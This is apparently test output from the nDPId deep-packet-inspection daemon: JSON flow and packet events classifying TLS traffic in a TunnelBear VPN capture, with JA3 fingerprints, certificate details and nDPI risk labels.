+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1655734776537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776537,"pkt":"ABoRAAACABoRAAABCABFAAAoAG5AABAGhiBoEXIoCggAAQG7hDanj6PbWHBcJVAS\/\/9FngAA"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776512,"flow_last_seen":1655734776537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776537,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776538,"flow_last_seen":1655734776538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776538,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1655734776538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776538,"pkt":"ABoRAAACABoRAAABCABFAAA8tphAAEAGn+EKCAABaBFyKIQ4AbtFRStWAAAAAKAC\/\/\/N+wAAAgQFtAQCCAoBZJ3OAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAoAHBAABAGhh5oEXIoCggAAQG7hDi6utSpRUUrV1AS\/\/9FnAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAovpZAAEAGl\/cKCAABaBFyKIQyAbvrdiNZFIncqFAQ\/\/9FowAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776520,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776539,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776539,"pkt":"ABoRAAACABoRAAABCABFAAAowetAAEAGlKIKCAABaBFyKIQ2AbtYcFwlp4+j3FAQ\/\/9FnwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776527,"flow_last_seen":1655734776539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776539,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1655734776541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776541,"pkt":"ABoRAAACABoRAAABCABFAAAotplAAEAGn\/QKCAABaBFyKIQ4AbtFRStXurrUqlAQ\/\/9FnQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776538,"flow_last_seen":1655734776541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776541,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":287,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776460,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776705,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776705,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776705,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1655734776705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776705,"pkt":"ABoRAAACABoRAAABCABFAAA8nhVAAEAG++kKCAABovfzvLxeAbvXLAPvAAAAAKAC\/\/9urgAAAgQFtAQCCAoBZJ36AAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1655734776707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776707,"pkt":"ABoRAAACABoRAAABCABFAAAoAHVAABAGyZ6i9\/O8CggAAQG7vF4o0\/wQ1ywD8FAS\/\/9Q+wAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1655734776707,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776707,"pkt":"ABoRAAACABoRAAABCABFAAAonhZAAEAG+\/wKCAABovfzvLxeAbvXLAPwKNP8EVAQ\/\/9Q\/AAA"} +00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776705,"flow_last_seen":1655734776708,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776708,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":307,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776527,"flow_last_seen":1655734776870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776870,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":308,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776520,"flow_last_seen":1655734776870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776870,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776516,"flow_last_seen":1655734776871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776871,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":312,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776538,"flow_last_seen":1655734776872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1655734776872,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33848,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"5badad76fbdd6e8b6296e2e9f4024401","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01193{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":313,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776512,"flow_last_seen":1655734776874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":5990,"flow_avg_l4_payload_len":998,"midstream":0,"thread_ts_msec":1655734776874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.tunnelbear.com","server_names":"*.tunnelbear.com,tunnelbear.com","ja3":"a1c672bda2bda1a05bdca801144b2760","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tunnelbear.com","alpn":"h2,http\/1.1","fingerprint":"52:96:E2:83:CC:15:4E:B3:0F:5B:1D:E2:E8:FF:4E:A9:C4:E9:C0:AF"}} +01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734776705,"flow_last_seen":1655734776969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1655734776969,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile-collector.newrelic.com","server_names":"*.newrelic.com,newrelic.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"a885fb01204bc11cc58efc02fe640899","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=New Relic, Inc., CN=*.newrelic.com","alpn":"http\/1.1","fingerprint":"90:B0:56:FB:4D:88:5C:EB:F9:79:45:35:26:15:0C:00:F4:08:72:77"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734777904,"flow_last_seen":1655734777904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734777904,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1655734777904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734777904,"pkt":"ABoRAAACABoRAAABCABFAAA8VQtAAEAGAW8KCAABaBFyKIRCAbtalsosAAAAAKAC\/\/8YcQAAAgQFtAQCCAoBZJ8nAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1655734777909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734777909,"pkt":"ABoRAAACABoRAAABCABFAAAoALVAABAGhdloEXIoCggAAQG7hEKlaTXTWpbKLVAS\/\/9FkgAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1655734777910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734777910,"pkt":"ABoRAAACABoRAAABCABFAAAoVQxAAEAGAYIKCAABaBFyKIRCAbtalsotpWk11FAQ\/\/9FkwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734777904,"flow_last_seen":1655734777912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734777912,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655734764418,"flow_last_seen":1655734764869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1655734776512,"flow_last_seen":1655734777353,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5473,"flow_tot_l4_payload_len":8586,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734524480,"flow_last_seen":1655734524990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":5884,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":47496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1655734755247,"flow_last_seen":1655734756001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2760,"flow_tot_l4_payload_len":4271,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734776705,"flow_last_seen":1655734778245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3864,"flow_tot_l4_payload_len":5977,"flow_avg_l4_payload_len":351,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"162.247.243.188","src_port":48222,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00748{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754648,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754648,"flow_last_seen":1655734754651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"8.8.8.8","src_port":51120,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1655734759670,"flow_last_seen":1655734762085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4026,"flow_tot_l4_payload_len":7794,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":421,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1655734754614,"flow_last_seen":1655734755078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1551,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1655734778245,"l3_proto":"ip4","src_ip":"10.158.132.91","dst_ip":"104.17.114.40","src_port":38398,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 